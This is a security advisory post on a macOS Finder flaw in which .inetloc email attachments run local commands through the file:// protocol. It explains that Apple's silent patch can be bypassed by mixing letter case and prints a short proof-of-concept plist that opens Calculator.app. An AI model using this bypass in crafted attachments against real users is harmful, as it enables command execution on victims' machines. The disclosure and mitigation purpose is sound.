MacOS Finder allows remote attackers to execute arbitrary commands by tricking users to run
SSD Secure Disclosure has announced a new vulnerability in macOS Finder system that allows remote attackers to execute arbitrary commands by tricking users to click on maliciously crafted
inetloc files embedded inside emails. Once clicked, the commands embedded inside the
inetloc files execute without any prompt or warning to the user.
inetloc files are shortcuts to an Internet location. They contain the server address and possibly the credentials for SSH or telnet connections. They are created by typing a URL in a text editor and dragging the URL text to the Desktop.
The vulnerability stems specifically from allowing the
inetloc to refer to locally stored files as well as the remote Internet addresses. Rather than specifying remote address with the
inetloc can execute local commands by using the
file:// protocol. If such an
inetloc file is attached to an email, clicking on the attachment will execute the maliciously crafted commands without any notice to the user.
The macOS Finder arbitrary command execution vulnerability originally affected macOS Big Sur and prior versions. However, SSD Secure Disclosure reports that the vulnerability has been patched silently by Apple without assigning a CVE identifier for it.
SSD Secure Disclosure also notes that the current patch only blocks the
file:// prefix and it can be bypassed via modifying the letter cases, as shown in the following derivates:
An example exploit code that can bypass the current patch and run the Calculator.app from the local file system is given below:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>URL</key> <string>FiLe:////////////////////////System/Applications/Calculator.app</string> </dict> </plist>
Note that, as a general security practice, access decisions should be based on permissions rather than exclusions, as advised by the fail-safe defaults principle, to prevent such vulnerabilities when designing secure systems.
An attacker could remotely execute arbitrary code and potentially gain full control of the system by tricking users into clicking maliciously crafted
inetloc file attachments.
Category: Arbitrary Command Execution
CVSS 3.1 Base Score: N/A
CVSS 3.1 Vector: N/A
The current patch against this vulnerability can be bypassed by changing the letter cases while specifying the
file:// protocol. To defend against possible attacks due to this vulnerability, users should follow the further updates by Apple that could remediate the flaw.
As the successful attacks against this vulnerability requires the adversaries to convince the users to open the malicious attachments via social engineering techniques, users should also watch out for phishing attacks.
With efficiency, you focus in making the entire program faster. If there is one or two outlier cases, you typically don’t worry about them. But with security, it’s exactly the opposite. You secure the average but the outliers are really the ones you worry about. Because those are the ones that attackers look for.Matt Bishop
Read more educational and inspirational cyber quotes at our page 100+ Best Cyber Security & Hacker Quotes.
References to Advisories, Solutions and Tools
- SSD Advisory – macOS Finder RCE